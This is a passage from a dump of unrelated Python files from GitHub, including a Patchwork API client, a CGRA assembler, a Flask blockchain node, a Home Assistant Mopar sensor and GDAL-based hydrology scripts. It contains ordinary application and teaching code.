LOG.error(\n 'Server error. Please report this issue to '\n 'https://github.com/getpatchwork/patchwork'\n )\n raise\n\n # we make the assumption that all responses will be JSON encoded\n if exc.response.status_code == 404:\n LOG.error('Resource not found')\n else:\n LOG.error(exc.response.json())\n else:\n LOG.error(\n 'Failed to %s resource. Is your configuration '\n 'correct?' % operation\n )\n LOG.error(\"Use the '--debug' flag for more information\")\n\n if CONF.debug:\n raise\n else:\n sys.exit(1)\n\n\ndef _get(\n url: str,\n params: ty.Optional[Filters] = None,\n stream: bool = False,\n) -> requests.Response:\n \"\"\"Make GET request and handle errors.\"\"\"\n LOG.debug('GET %s', url)\n\n try:\n # TODO(stephenfin): We only use a subset of the types possible for\n # 'params' (namely a list of tuples) but it doesn't seem possible to\n # indicate this\n rsp = requests.get(\n url,\n auth=_get_auth(optional=True),\n headers=_get_headers(),\n stream=stream,\n params=params,\n ) # type: ignore\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('fetch', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _post(\n url: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> requests.Response:\n \"\"\"Make POST request and handle errors.\"\"\"\n LOG.debug('POST %s, data=%r', url, data)\n\n try:\n rsp = requests.post(\n url, auth=_get_auth(), headers=_get_headers(), data=data\n )\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('create', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _patch(\n url: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> requests.Response:\n \"\"\"Make PATCH request and handle errors.\"\"\"\n LOG.debug('PATCH %s, data=%r', url, data)\n\n try:\n rsp = requests.patch(\n url,\n auth=_get_auth(),\n headers=_get_headers(),\n data=data,\n )\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('update', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef _delete(url: str) -> requests.Response:\n \"\"\"Make DELETE request and handle errors.\"\"\"\n LOG.debug('DELETE %s', url)\n\n try:\n rsp = requests.delete(url, auth=_get_auth(), headers=_get_headers())\n rsp.raise_for_status()\n except requests.exceptions.RequestException as exc:\n _handle_error('delete', exc)\n\n LOG.debug('Got response')\n\n return rsp\n\n\ndef version() -> ty.Tuple[int, int]:\n \"\"\"Get the version of the server from the URL, if present.\"\"\"\n server = _get_server()\n\n version = re.match(r'.*/(\\d)\\.(\\d)$', server)\n if version:\n return (int(version.group(1)), int(version.group(2)))\n\n # return the oldest version we support if no version provided\n return (1, 0)\n\n\ndef download(\n url: str,\n params: ty.Optional[Filters] = None,\n output: ty.Optional[ty.Optional[str]] = None,\n) -> ty.Optional[str]:\n \"\"\"Retrieve a specific API resource and save it to a file/stdout.\n\n The ``Content-Disposition`` header is assumed to be present and\n will be used for the output filename, if not writing to stdout.\n\n Arguments:\n url: The resource URL.\n params: Additional parameters.\n output: The output file. If output is a directory then\n the file name will be according to the patch subject and\n will be downloaded into the output directory.\n If None, a temporary file will be used.\n\n Returns:\n A path to an output file containing the content, else None if stdout\n used.\n \"\"\"\n rsp = _get(url, params, stream=True)\n\n # we don't catch anything here because we should break if these are missing\n header = re.search(\n 'filename=(.+)',\n rsp.headers.get('content-disposition') or '',\n )\n if not header:\n LOG.error('Filename was expected but was not provided in response')\n sys.exit(1)\n\n if output == '-':\n output_path = output\n output_file = sys.stdout.buffer\n else:\n if output:\n output_path = output\n if os.path.isdir(output):\n output_path = os.path.join(output, header.group(1))\n else:\n output_path = os.path.join(\n tempfile.mkdtemp(prefix='git-pw'),\n header.group(1),\n )\n LOG.debug('Saving to %s', output_path)\n output_file = open(output_path, 'wb')\n\n try:\n # we use iter_content because patches can be binary\n for block in rsp.iter_content(1024):\n output_file.write(block)\n finally:\n output_file.close()\n\n return output_path\n\n\ndef index(resource_type: str, params: ty.Optional[Filters] = None) -> dict:\n \"\"\"List API resources.\n\n GET /{resource}/\n\n All resources are JSON bodies, thus we can access them in a similar\n fashion.\n\n Arguments:\n resource_type: The resource endpoint name.\n params: Additional parameters, filters.\n\n Returns:\n A list of dictionaries, representing the summary view of each resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, ''])\n\n # NOTE(stephenfin): Not all endpoints in the Patchwork API allow filtering\n # by project, but all the ones we care about here do.\n params = params or []\n params.append(('project', _get_project()))\n\n return _get(url, params).json()\n\n\ndef detail(\n resource_type: str,\n resource_id: ty.Union[str, int],\n params: ty.Optional[Filters] = None,\n) -> ty.Dict:\n \"\"\"Retrieve a specific API resource.\n\n GET /{resource}/{resourceID}/\n\n Arguments:\n resource_type: The resource endpoint name.\n resource_id: The ID for the specific resource.\n params: Additional parameters.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n return _get(url, params, stream=False).json()\n\n\ndef create(\n resource_type: str,\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> dict:\n \"\"\"Create a new API resource.\n\n POST /{resource}/\n\n Arguments:\n resource_type: The resource endpoint name.\n params: Fields to update.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, ''])\n\n return _post(url, data).json()\n\n\ndef delete(resource_type: str, resource_id: ty.Union[str, int]) -> None:\n \"\"\"Delete a specific API resource.\n\n DELETE /{resource}/{resourceID}/\n\n Arguments:\n resource_type: The resource endpoint name.\n resource_id: The ID for the specific resource.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n _delete(url)\n\n\ndef update(\n resource_type: str,\n resource_id: ty.Union[str, int],\n data: ty.List[ty.Tuple[str, ty.Any]],\n) -> dict:\n \"\"\"Update a specific API resource.\n\n PATCH /{resource}/{resourceID}/\n\n Arguments:\n resource_type: The resource endpoint name.\n resource_id: The ID for the specific resource.\n params: Fields to update.\n\n Returns:\n A dictionary representing the detailed view of a given resource.\n \"\"\"\n # NOTE(stephenfin): All resources must have a trailing '/'\n url = '/'.join([_get_server(), resource_type, str(resource_id), ''])\n\n return _patch(url, data).json()\n\n\ndef validate_minimum_version(\n min_version: ty.Tuple[int, int],\n msg: str,\n) -> ty.Callable[[ty.Any], ty.Any]:\n def inner(f):\n @click.pass_context\n def new_func(ctx, *args, **kwargs):\n if version() < min_version:\n LOG.error(msg)\n sys.exit(1)\n\n return ctx.invoke(f, *args, **kwargs)\n\n return update_wrapper(new_func, f)\n\n return inner\n\n\ndef validate_multiple_filter_support(f: ty.Callable) -> ty.Callable:\n @click.pass_context\n def new_func(ctx, *args, **kwargs):\n if version() >= (1, 1):\n return ctx.invoke(f, *args, **kwargs)\n\n for param in ctx.command.params:\n if not param.multiple:\n continue\n\n if param.name in ('headers'):\n continue\n\n value = list(kwargs[param.name] or [])\n if value and len(value) > 1 and value != param.default:\n msg = (\n 'The `--%s` filter was specified multiple times. '\n 'Filtering by multiple %ss is not supported with API '\n 'version 1.0. If the server supports it, use version '\n '1.1 instead. Refer to https://tinyurl.com/2p8swbpn for '\n 'more information.'\n )\n\n LOG.warning(msg, param.name, param.name)\n\n return ctx.invoke(f, *args, **kwargs)\n\n return update_wrapper(new_func, f)\n\n\ndef retrieve_filter_ids(\n resource_type: str,\n filter_name: str,\n filter_value: str,\n) -> ty.List[ty.Tuple[str, str]]:\n \"\"\"Retrieve IDs for items passed through by filter.\n\n Some filters require client-side filtering, e.g. filtering patches by\n submitter names.\n\n Arguments:\n resource_type: The filter's resource endpoint name.\n filter_name: The name of the filter.\n filter_value: The value of the filter.\n\n Returns:\n A list of querystring key-value pairs to use in the actual request.\n \"\"\"\n if len(filter_value) < 3:\n # protect agaisnt really generic (and essentially meaningless) queries\n LOG.error('Filters must be at least 3 characters long')\n sys.exit(1)\n\n # NOTE(stephenfin): This purposefully ignores the possiblity of a second\n # page because it's unlikely and likely unnecessary\n items = index(resource_type, [('q', filter_value)])\n if len(items) == 0:\n LOG.warning('No matching %s found: %s', filter_name, filter_value)\n elif len(items) > 1 and version() < (1, 1):\n # we don't support multiple filters in 1.0\n msg = (\n 'More than one match for found for `--%s=%s`. '\n 'Filtering by multiple %ss is not supported with '\n 'API version 1.0. If the server supports it, use '\n 'version 1.1 instead. Refer to https://tinyurl.com/2p8swbpn '\n 'for more information.'\n )\n\n LOG.warning(msg, filter_name, filter_value, filter_name)\n\n return [(filter_name, item['id']) for item in items]\n","repo_name":"getpatchwork/git-pw","sub_path":"git_pw/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"75"} +{"seq_id":"17683505114","text":"import re\n\nfrom hw.utils import to_hex\nfrom src.hw.cgra_configuration import CgraConfiguration\n\n\nclass CgraAssembler:\n def __init__(self, cgra, asm_file, output_file=None):\n self.cgra = cgra\n self.cc = CgraConfiguration(cgra)\n self.asm_file = asm_file\n self.output_file = output_file\n self.alu_inst = {}\n self.routes_inst = {}\n self.const = []\n self.accumulator = []\n self.last_error = ''\n self.used_inputs = []\n self.used_outputs = []\n self.ostream_ignore = []\n self.ostream_ignore_loop = []\n\n def reset(self):\n self.alu_inst.clear()\n self.routes_inst.clear()\n self.const.clear()\n self.accumulator.clear()\n self.last_error = ''\n self.used_inputs.clear()\n self.used_outputs.clear()\n self.ostream_ignore.clear()\n self.ostream_ignore_loop.clear()\n\n def parse(self):\n f = open(self.asm_file)\n lines = f.read().split('\\n')\n f.close()\n i = 1\n self.last_error = ''\n for line in lines:\n line = line.split('//')[0]\n if line and line[0] != '#':\n line = re.sub(' +', ' ', line)\n tokens = line.split(' ')\n if tokens[0] == 'route':\n r, v = self.decode_route_inst(tokens)\n if r:\n self.routes_inst[i] = v\n else:\n self.last_error = 'line %d: %s' % (i, v)\n return\n elif tokens[0] == 'set':\n r, v = self.decode_set_inst(i, tokens)\n if not r:\n self.last_error = 'line %d: %s' % (i, v)\n else:\n r, v = self.decode_alu_inst(i, tokens)\n if r:\n self.alu_inst[i] = v\n else:\n self.last_error = 'line %d: %s' % (i, v)\n return\n i += 1\n\n def decode_set_inst(self, line, inst):\n try:\n val = max(int(inst[3]), 1)\n if inst[2] == '$ostream_ignore':\n val *= 3 # 3 é o pipeline atual da alu dos PEs.\n self.ostream_ignore.append((line, int(inst[1][1:]), val))\n elif inst[2] == '$ostream_loop':\n self.ostream_ignore_loop.append((line, int(inst[1][1:]), val))\n elif inst[2] == '$accumulator':\n self.accumulator.append((line, int(inst[1][1:]), val))\n else:\n return False, 'Invalid argument.'\n except Exception as e:\n return False, str(e)\n\n return True, ''\n\n def decode_alu_inst(self, line, inst):\n try:\n op = inst[0]\n pe = int(inst[1][1:])\n alu_src = []\n delays = []\n tok = inst[2:]\n is_istream = False\n for j in range(len(tok)):\n i = tok[j]\n if '#' in i:\n delays.append((j, int(i[1:])))\n else:\n if 'alu' in i or 'istream' in i or 'acc' in i:\n alu_src.append(i[1:])\n if 'istream' in i:\n is_istream = True\n elif '$' in i:\n alu_src.append(int(i[1:]))\n else:\n alu_src.append('const')\n self.const.append((line, pe, int(i)))\n\n for i in range(len(delays)):\n idx, v = delays[i]\n delays[i] = (alu_src.index(alu_src[idx]), v)\n\n except Exception as e:\n return False, str(e)\n if is_istream:\n self.used_inputs.append(pe)\n\n return True, [pe, op, alu_src, delays]\n\n def decode_route_inst(self, inst):\n try:\n pe = int(inst[1][1:])\n if 'alu' in inst[2][1:]:\n src = 'alu'\n else:\n src = int(inst[2][1:])\n if 'ostream' in inst[3][1:]:\n dst = 'ostream'\n else:\n dst = int(inst[3][1:])\n except Exception as e:\n return None, str(e)\n\n if dst == 'ostream':\n self.used_outputs.append(pe)\n return True, [pe, {dst: src}]\n\n def compile(self):\n self.reset()\n self.parse()\n machine_code = ''\n if self.last_error == '':\n for line, conf in self.alu_inst.items():\n r, v = self.cc.create_alu_conf(conf[0], conf[1], conf[2], conf[3])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if 'acc' in conf[2]:\n r, v = self.cc.create_reset_conf(conf[0])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n for line, i, const in self.const:\n r, v = self.cc.create_const_conf(i, const)\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n for line, i, acc in self.accumulator:\n r, v = self.cc.create_acc_reset_conf(i, acc)\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error == '':\n routing = {}\n for line, c in self.routes_inst.items():\n if c[0] in routing.keys():\n routing[c[0]].update(c[1])\n else:\n routing[c[0]] = c[1]\n\n for line, co in self.routes_inst.items():\n r, v = self.cc.create_router_conf(co[0], routing[co[0]])\n if r:\n for c in v:\n machine_code += c + '\\n'\n else:\n self.last_error = 'line %d: %s' % (line, v)\n break\n\n if self.last_error:\n print('Compile error on %s' % self.last_error)\n return None\n\n if self.output_file:\n f = open(self.output_file, 'w')\n f.write(machine_code[:-1])\n f.close()\n print('Build succeeded, output file save in %s' % self.output_file)\n\n return machine_code[:-1]\n","repo_name":"mfkiwl/hpcgra","sub_path":"src/hw/cgra_assembler.py","file_name":"cgra_assembler.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4851155936","text":"from __future__ import print_function\n\nfrom OCC.Core.gp import gp_Pnt2d,gp_Pnt,gp_Circ,gp_Ax2\nfrom OCC.Core.Geom import Geom_Circle,Geom_BSplineCurve\nfrom OCC.Core.TColgp import TColgp_Array1OfPnt\nfrom OCC.Core.TColStd import TColStd_Array1OfReal,TColStd_Array1OfInteger\nfrom OCC.Display.SimpleGui import init_display\ndisplay, start_display, add_menu, add_function_to_menu = init_display()\n\n# the first bezier curve\narray = TColgp_Array1OfPnt(1, 4)\narray.SetValue(1, gp_Pnt(0, 0,0))\narray.SetValue(2, gp_Pnt(1, 0,0))\narray.SetValue(3, gp_Pnt(1, 1,0))\narray.SetValue(4, gp_Pnt(3, 3,0))\nweights=TColStd_Array1OfReal(1,4)\nknots=TColStd_Array1OfReal(1,3)\nmultiplicities=TColStd_Array1OfInteger(1,3)\nmultiplicities.SetValue(1,3)\nmultiplicities.SetValue(2,1)\nmultiplicities.SetValue(3,3)\nknots.SetValue(1,0.0)\nknots.SetValue(2,0.5)\nknots.SetValue(3,1.0)\nweights.SetValue(1,1.0)\nweights.SetValue(2,1.0)\nweights.SetValue(3,1.0)\nweights.SetValue(4,1.0)\n\nnurbs = Geom_BSplineCurve(array,weights,knots,multiplicities,2,False,True )\nprint(nurbs.Period())\ndisplay.DisplayShape(nurbs, update=True, color='RED')\nstart_display()\n","repo_name":"chen1180/CurveEditor_pythonOCC","sub_path":"test/create_geometry/create_nurb.py","file_name":"create_nurb.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"71191860403","text":"from __future__ import absolute_import\n\nimport os\n\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings')\n\napp = Celery('config')\n\napp.conf.beat_schedule = {\n 'notify-every-5-min': {\n 'task': 'team_production_system.tasks.notify',\n 'schedule': 300.0,\n },\n}\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","repo_name":"TeamProductionSystem/Momentors_Backend","sub_path":"config/celery_settings.py","file_name":"celery_settings.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"10683363775","text":"from LL import LinkedList, Node\r\ndef printIthNode(head, index):\r\n count = 0\r\n pointer = head\r\n while count < index:\r\n pointer = pointer.next\r\n count += 1\r\n print(\"Value at %dth node: \" % (index), pointer.data)\r\nmyList = LinkedList([1, 2, 3, 4, 5])\r\n\r\nprintIthNode(myList.head, 0)","repo_name":"vardhinialuru05/ALGORITHMS","sub_path":"DSA_INTERVIEW/linkedlists/ithnode.py","file_name":"ithnode.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8971630689","text":"import sys\nimport os\nfrom pathlib import Path\n\nmyDir = os.getcwd()\nsys.path.append(myDir)\npath = Path(myDir)\nabsolute_path = str(path.parent.absolute())\nsys.path.append(absolute_path)\n\nimport requests\nfrom random import randint\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom src.blockchain.blockchain import Blockchain\nfrom src.blockchain.block import Block\nfrom src.util import is_port_in_use\nfrom src.constant import HOST\n\napp = Flask(__name__)\nCORS(app)\nblockchain = Blockchain()\n\n\n@app.route('/')\ndef index():\n return ''\n\n\n@app.route('/chain')\ndef chain():\n response = {\n 'chain': blockchain.to_json(),\n 'len': len(blockchain.chain)\n }\n return jsonify(response)\n\n\n@app.route('/length')\ndef chain_length():\n return jsonify({'len': len(blockchain.chain)})\n\n\n@app.route('/chain/add/block', methods=['POST'])\ndef add_block():\n response = {}\n\n potential_block_json = request.get_json()\n\n if blockchain.add_block(Block.from_json(potential_block_json)):\n block = blockchain.chain[-1]\n response['block'] = block.to_json()\n response['added'] = True\n else:\n response['block'] = 'Invalid block'\n response['added'] = False\n\n return jsonify(response)\n\n\n@app.route('/chain/broadcast')\ndef broadcast_chain():\n ports = all_other_ports()\n\n bc_response = {\n 'success_ports': [],\n 'fail_ports': []\n }\n\n for port in ports:\n url = f'http://{HOST}:{port}/chain/resolve'\n response = requests.post(url, json=blockchain.to_json())\n if response.status_code == 200:\n if response.json()['success']:\n bc_response['success_ports'].append(port)\n else:\n bc_response['fail_ports'].append(port)\n\n return jsonify(bc_response)\n\n\n@app.route('/chain/resolve', methods=['POST'])\ndef resolve_chain():\n rs_chain_json = request.get_json()\n rs_chain = Blockchain.from_json(rs_chain_json)\n\n response = {\n 'message': f'Current len: {len(blockchain.chain)}\\nIncoming len: {len(rs_chain.chain)}'\n }\n\n try:\n if blockchain.replace_chain(rs_chain):\n response['success'] = True\n else:\n response['success'] = False\n except Exception:\n raise ValueError('Invalid chain')\n\n return jsonify(response)\n\n\ndef all_other_ports():\n url = f'http://{HOST}:8001/ports/all/other/?current_port={server_port}'\n response = requests.get(url)\n if response.status_code == 200:\n return response.json()['ports']\n else:\n print('Cannot connect to ports manager')\n return ''\n\n\nif __name__ == '__main__':\n server_port = randint(5001, 5999)\n\n while is_port_in_use(server_port):\n server_port = randint(5001, 5999)\n\n print('======= register node ========')\n request_url = f'http://{HOST}:8001/ports/add/?port={str(server_port)}'\n requests.post(request_url)\n\n app.run(host=HOST, port=server_port, debug=True, use_reloader=False)\n","repo_name":"zwan0202/double-spend-attack","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"20418172495","text":"\"\"\"\nSensor for Mopar vehicles.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/sensor.mopar/\n\"\"\"\nfrom datetime import timedelta\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import DOMAIN, PLATFORM_SCHEMA\nfrom homeassistant.const import (\n ATTR_ATTRIBUTION, ATTR_COMMAND, CONF_PASSWORD, CONF_PIN, CONF_USERNAME,\n LENGTH_KILOMETERS)\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\n\nREQUIREMENTS = ['motorparts==1.0.2']\n\n_LOGGER = logging.getLogger(__name__)\n\nATTR_VEHICLE_INDEX = 'vehicle_index'\n\nCOOKIE_FILE = 'mopar_cookies.pickle'\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(days=7)\n\nSERVICE_REMOTE_COMMAND = 'mopar_remote_command'\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_USERNAME): cv.string,\n vol.Required(CONF_PASSWORD): cv.string,\n vol.Required(CONF_PIN): cv.positive_int,\n})\n\nREMOTE_COMMAND_SCHEMA = vol.Schema({\n vol.Required(ATTR_COMMAND): cv.string,\n vol.Required(ATTR_VEHICLE_INDEX): cv.positive_int\n})\n\n\n# pylint: disable=unused-argument\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the Mopar platform.\"\"\"\n import motorparts\n cookie = hass.config.path(COOKIE_FILE)\n try:\n session = motorparts.get_session(\n config.get(CONF_USERNAME), config.get(CONF_PASSWORD),\n config.get(CONF_PIN), cookie_path=cookie)\n except motorparts.MoparError:\n _LOGGER.error(\"Failed to login\")\n return\n\n def _handle_service(service):\n \"\"\"Handle service call.\"\"\"\n index = service.data.get(ATTR_VEHICLE_INDEX)\n command = service.data.get(ATTR_COMMAND)\n try:\n motorparts.remote_command(session, command, index)\n except motorparts.MoparError as error:\n _LOGGER.error(str(error))\n\n hass.services.register(DOMAIN, SERVICE_REMOTE_COMMAND, _handle_service,\n schema=REMOTE_COMMAND_SCHEMA)\n\n data = MoparData(session)\n add_devices([MoparSensor(data, index)\n for index, _ in enumerate(data.vehicles)], True)\n\n\nclass MoparData(object):\n \"\"\"Container for Mopar vehicle data.\n\n Prevents session expiry re-login race condition.\n \"\"\"\n\n def __init__(self, session):\n \"\"\"Initialize data.\"\"\"\n self._session = session\n self.vehicles = []\n self.vhrs = {}\n self.tow_guides = {}\n self.update()\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self, **kwargs):\n \"\"\"Update data.\"\"\"\n import motorparts\n _LOGGER.info(\"Updating vehicle data\")\n try:\n self.vehicles = motorparts.get_summary(self._session)['vehicles']\n except motorparts.MoparError:\n _LOGGER.exception(\"Failed to get summary\")\n return\n for index, _ in enumerate(self.vehicles):\n try:\n self.vhrs[index] = motorparts.get_report(self._session, index)\n self.tow_guides[index] = motorparts.get_tow_guide(\n self._session, index)\n except motorparts.MoparError:\n _LOGGER.warning(\"Failed to update for vehicle index %s\", index)\n\n\nclass MoparSensor(Entity):\n \"\"\"Mopar vehicle sensor.\"\"\"\n\n def __init__(self, data, index):\n \"\"\"Initialize the sensor.\"\"\"\n self._index = index\n self._vehicle = {}\n self._vhr = {}\n self._tow_guide = {}\n self._odometer = None\n self._data = data\n\n def update(self):\n \"\"\"Update device state.\"\"\"\n self._data.update()\n self._vehicle = self._data.vehicles[self._index]\n self._vhr = self._data.vhrs.get(self._index, {})\n self._tow_guide = self._data.tow_guides.get(self._index, {})\n if 'odometer' in self._vhr:\n odo = float(self._vhr['odometer'])\n self._odometer = int(self.hass.config.units.length(\n odo, LENGTH_KILOMETERS))\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return '{} {} {}'.format(\n self._vehicle['year'], self._vehicle['make'],\n self._vehicle['model'])\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return self._odometer\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n import motorparts\n attributes = {\n ATTR_VEHICLE_INDEX: self._index,\n ATTR_ATTRIBUTION: motorparts.ATTRIBUTION\n }\n attributes.update(self._vehicle)\n attributes.update(self._vhr)\n attributes.update(self._tow_guide)\n return attributes\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement.\"\"\"\n return self.hass.config.units.length_unit\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return 'mdi:car'\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/sensor/mopar.py","file_name":"mopar.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"27271090132","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.exceptions import APIException, ParseError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom openedx.core.djangoapps.schedules.utils import reset_self_paced_schedule\n\n\nclass UnableToResetDeadlines(APIException):\n status_code = 400\n default_detail = 'Unable to reset deadlines.'\n default_code = 'unable_to_reset_deadlines'\n\n\n@permission_classes((IsAuthenticated,))\n@api_view(['POST'])\ndef reset_course_deadlines(request):\n course_key = request.data.get('course_key', None)\n\n # If body doesnt contain 'course_key', return 400 to client.\n if not course_key:\n raise ParseError(\"'course_key' is required.\")\n\n # If body contains params other than 'course_key', return 400 to client.\n if len(request.data) > 1:\n raise ParseError(\"Only 'course_key' is expected.\")\n\n try:\n reset_self_paced_schedule(request.user, course_key)\n return Response({'message': 'Deadlines successfully reset.'})\n except Exception:\n raise UnableToResetDeadlines\n","repo_name":"JimmyKosgei/jimmykkedx","sub_path":"openedx/features/course_experience/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29541743422","text":"import json\r\nimport gzip\r\nimport array\r\nimport numpy as np\r\n#数据处理第二步,根据5-core的评论生成rating的csv文件\r\n\r\ndef parse(path):\r\n g = gzip.open(path, 'r')\r\n for l in g:\r\n yield eval(l)\r\n\r\ndef readImageAsin(path):\r\n f = open(path, 'rb')\r\n try:\r\n while True:\r\n asin = f.read(10)\r\n if asin == '' : \r\n break\r\n a = array.array('f')\r\n a.fromfile(f, 4096)\r\n yield asin\r\n except EOFError:\r\n pass\r\n\r\ncategory = 'Movies_and_TV'\r\nk_core = '_5'\r\nusers = []\r\nitems = []\r\nratings = []\r\ncount = 0\r\n\r\nfor review in parse(category + \"/reviews_\" + category + k_core +\".json.gz\"):\r\n users.append(review['reviewerID'])\r\n items.append(review['asin'])\r\n ratings.append(review['overall'])\r\n count += 1\r\ndata_amount = count\r\nprint('Read reviews over, data amount = ', data_amount)\r\n\r\nfrating = open(category + \"/ratings_\" + category + k_core + \".csv\", 'w')\r\nfor user, item, rating in zip(users, items, ratings):\r\n frating.write(user + ',' + item + ',' + str(int(rating)) +'\\n')\r\n","repo_name":"XMUDM/Deamer","sub_path":"data_preprocess/generate_rating_5.py","file_name":"generate_rating_5.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"14970936017","text":"\"\"\"\nWrite a function that determines whether an array contain a pair\nof numbers that sum up to a certain integer and returns that pair\nI.e. 10, [3, 4, 1, 2, 8] -> (2, 9)\n\"\"\"\n\n\ndef contains_sum_of(number, array):\n \"\"\"Algo: for every number, we know what the number is that need to be added\n to get a sum. Iretate over the array, add every number in the array to a dictionary,\n and see if the summing number is in the dictionary.\n Complexity: O(n)\n \"\"\"\n pairs = []\n\n # Dictionary of numbers already seen\n numbers_seen = {}\n second_number = None\n for n in array:\n summing_number = number - n\n if summing_number in numbers_seen:\n pairs.append((n, summing_number))\n else:\n numbers_seen[n] = 1\n\n return pairs if pairs else None\n\nprint(contains_sum_of(10, [3, 4, 1, 2, 2, 5 ,5, 8]))\n\nprint(contains_sum_of(10, [3, 4]))\n","repo_name":"ssarber/PythonClass","sub_path":"algorithms/two_number_sum.py","file_name":"two_number_sum.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27160407317","text":"from osgeo import gdal, ogr\nimport subprocess\n\n#Variables\nOutlets = './static/uploads/Outlet.shp'\nBasin = './static/uploads/Basin.shp'\nSource = './static/uploads/Source.shp'\n\ndef ContaminationFlow():\n \n BASINang = './static/uploads/BASINang.tif'\n BASINdm = './static/uploads/BASINdm.tif'\n SourceR = './static/uploads/SourceR.tif'\n BASINdg = './static/uploads/BASINdg.tif'\n BASINctpt = './static/uploads/BASINctpt.tif'\n BASINnet = './static/uploads/BASINsrcndCrop.tif'\n ContamArea = './static/uploads/ContaminationAreas.tif'\n R1 = './static/uploads/R1.tif'\n R2 = './static/uploads/R2.tif'\n R3 = './static/uploads/R3.tif'\n ContamShp = './static/uploads/ContaminationAreas.shp'\n \n \n raster = gdal.Open('./static/uploads/BASINang.tif')\n gt =raster.GetGeoTransform()\n pixelSizeX = gt[1]\n pixelSizeY =-gt[5]\n print (pixelSizeX)\n print (pixelSizeY)\n minx = gt[0]\n maxy = gt[3]\n maxx = minx + gt[1]*raster.RasterXSize\n miny = maxy + gt[5]*raster.RasterYSize\n print (minx,miny,maxx,maxy)\n \n # Generate Contaminate Flow - including fertilisers\n #Rasterize Source\n cmd1=\"gdal_rasterize -a id -tr '{0}' '{1}' -a_nodata 0.0 -te '{2}' '{3}' '{4}' '{5}' -ot Float32 -of GTiff '{6}' '{7}'\".format(pixelSizeX, pixelSizeY, minx, miny, maxx, maxy, Source, SourceR)\n subprocess.call(cmd1, shell=True)\n #Translate Source\n cmd2=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(SourceR, BASINdg)\n subprocess.call(cmd2, shell=True)\n #Rasterize Basin\n cmd3=\"gdal_rasterize -a fid -tr '{0}' '{1}' -a_nodata 0.0 -te '{2}' '{3}' '{4}' '{5}' -ot 